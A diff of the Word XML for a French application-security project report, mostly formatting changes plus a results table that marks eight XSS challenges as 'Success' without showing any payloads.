--- a/Rapport - Securite des applications (projet).docx
+++ b/Rapport - Securite des applications (projet).docx
@@ -4,115 +4,33 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Titre"/>
-      </w:pPr>
-      <w:sdt>
-        <w:sdtPr>
-          <w:alias w:val="Titre :"/>
-          <w:tag w:val="Titre :"/>
-          <w:id w:val="726351117"/>
-          <w:placeholder>
-            <w:docPart w:val="D1369B47B62748B39D8C9FD91A824896"/>
-          </w:placeholder>
-          <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
-          <w15:appearance w15:val="hidden"/>
-          <w:text w:multiLine="1"/>
-        </w:sdtPr>
-        <w:sdtEndPr/>
-        <w:sdtContent>
-          <w:r>
-            <w:t>Kevin Valerio</w:t>
-          </w:r>
-        </w:sdtContent>
-      </w:sdt>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Titre20"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:noProof/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
-        <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:posOffset>1772920</wp:posOffset>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>52705</wp:posOffset>
-            </wp:positionV>
-            <wp:extent cx="149938" cy="113030"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
-            <wp:wrapNone/>
-            <wp:docPr id="1" name="Image 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 1"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId9" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:srcRect l="17782" t="21683" r="18070" b="21474"/>
-                    <a:stretch/>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="149938" cy="113030"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
-                    <a:extLst>
-                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
-                      </a:ext>
-                    </a:extLst>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-            <wp14:sizeRelH relativeFrom="margin">
-              <wp14:pctWidth>0</wp14:pctWidth>
-            </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="margin">
-              <wp14:pctHeight>0</wp14:pctHeight>
-            </wp14:sizeRelV>
-          </wp:anchor>
-        </w:drawing>
+        <w:t>Kevin Valerio</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  -   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>valerio.kevin83@gmail.com</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre20"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre20"/>
-      </w:pPr>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -132,7 +50,7 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -148,7 +66,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -162,7 +80,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -179,8 +97,37 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="0" w:name="_GoBack" w:colFirst="2" w:colLast="2"/>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>XSS #1 </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -189,24 +136,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -214,34 +169,84 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>XSS #</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="1189"/>
+                <w:tab w:val="center" w:pos="1394"/>
+              </w:tabs>
             </w:pPr>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -249,8 +254,46 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>XSS #</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -259,24 +302,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -284,8 +335,46 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>XSS #</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -294,24 +383,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -319,8 +416,46 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>XSS #</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -329,24 +464,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -354,8 +497,46 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>XSS #</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -364,24 +545,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -389,8 +578,46 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>XSS #</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -399,24 +626,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -424,8 +659,46 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>XSS #</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -434,24 +707,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -459,8 +740,36 @@
         <w:tc>
           <w:tcPr>
